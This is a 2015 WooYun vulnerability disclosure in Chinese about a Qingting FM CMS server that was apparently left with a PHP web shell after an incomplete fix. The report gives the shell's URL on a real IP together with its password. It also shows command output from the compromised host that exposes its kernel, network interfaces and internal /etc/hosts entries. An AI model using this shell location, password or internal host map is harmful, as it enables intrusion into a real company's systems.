当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114694

漏洞标题:蜻蜓fm某站点修复不当shell一枚

相关厂商:qingting.fm

漏洞作者: 爱上平顶山

提交时间:2015-05-18 09:16

修复时间:2015-05-23 09:18

公开时间:2015-05-23 09:18

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-18: 细节已通知厂商并且等待厂商处理中
2015-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

...

详细说明:

蜻蜓fm
每天习惯看公开漏洞 就发现了
http://cms.qingting.fm/ 115.29.168.119
shell地址:
http://115.29.168.119/phpsso_server/uploadfile/avatar/1/1/1/3333/22.php
PW:cmd

[*] 基本信息 [ 	Linux tair-cache2 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64(www-data) ]
[/]$ ls -al
total 92
drwxr-xr-x 24 root root  4096 Nov 25 17:24 .
drwxr-xr-x 24 root root  4096 Nov 25 17:24 ..
drwxr-xr-x  2 root root  4096 Aug 14  2012 bin
drwxr-xr-x  3 root root  4096 Aug 14  2012 boot
drwxr-xr-x  3 root root  4096 Nov 25 16:58 data
drwxr-xr-x 13 root root  3920 Aug 22  2014 dev
drwxr-xr-x 94 root root  4096 Nov 25 17:46 etc
drwxr-xr-x  6 root root  4096 Aug  4  2014 home
lrwxrwxrwx  1 root root    33 Aug 14  2012 initrd.img -> /boot/initrd.img-3.2.0-29-generic
drwxr-xr-x 18 root root  4096 Oct 11  2013 lib
drwxr-xr-x  2 root root  4096 Oct 11  2013 lib64
drwx------  2 root root 16384 Aug  6  2012 lost+found
drwxr-xr-x  3 root root  4096 Aug  6  2012 media
drwxr-xr-x  6 root root  4096 Aug 22  2014 mnt
drwxr-xr-x  4 root root  4096 Nov 25 17:22 opt
dr-xr-xr-x 92 root root     0 Jul 12  2014 proc
drwx------  7 root root  4096 May  7 17:32 root
drwxr-xr-x 17 root root   620 May  7 17:31 run
drwxr-xr-x  2 root root  4096 Oct 11  2013 sbin
drwxr-xr-x  2 root root  4096 Mar  6  2012 selinux
drwxr-xr-x  8 root root  4096 Feb 21  2014 srv
drwxr-xr-x 13 root root     0 Jul 12  2014 sys
drwxrwxrwt  4 root root  4096 May 17 21:46 tmp
drwxr-xr-x 10 root root  4096 Aug  6  2012 usr
drwxr-xr-x 12 root root  4096 Jul 11  2014 var
lrwxrwxrwx  1 root root    29 Aug 14  2012 vmlinuz -> boot/vmlinuz-3.2.0-29-generic
[/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:00:00:79  
          inet addr:10.161.160.154  Bcast:10.161.175.255  Mask:255.255.240.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:78525121850 errors:0 dropped:0 overruns:0 frame:0
          TX packets:59586094348 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:7717644743701 (7.7 TB)  TX bytes:8608882769850 (8.6 TB)
          Interrupt:79 
eth1      Link encap:Ethernet  HWaddr 00:16:3e:00:00:7a  
          inet addr:115.29.168.119  Bcast:115.29.171.255  Mask:255.255.252.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3385845258 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1555647032 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:178045428627 (178.0 GB)  TX bytes:104083414530 (104.0 GB)
          Interrupt:80 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:29569487305 errors:0 dropped:0 overruns:0 frame:0
          TX packets:29569487305 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:5492121412970 (5.4 TB)  TX bytes:5492121412970 (5.4 TB)
[/]$ uname -a
Linux tair-cache2 3.2.0-29-generic #46-Ubuntu SMP Fri Jul 27 17:03:23 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
[/]$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1	ubuntu
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
42.121.18.19 ldap.qingting.fm
10.160.3.201    tair1
10.160.3.202    tair2
10.200.113.236  tair3
10.200.113.233  tair4
10.200.113.237  tair5
10.200.113.234  tair6
10.161.160.153 tair-cache1
10.161.160.154 tair-cache2
10.132.11.47 zk1
10.132.20.38 zk2
[/]$


0.jpg


1.jpg


ok 排查吧

漏洞证明:

···

修复方案:

运维加强.

版权声明:转载请注明来源 爱上平顶山@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-23 09:18

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-25 10:09 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    不内网,他们不高兴,忽略了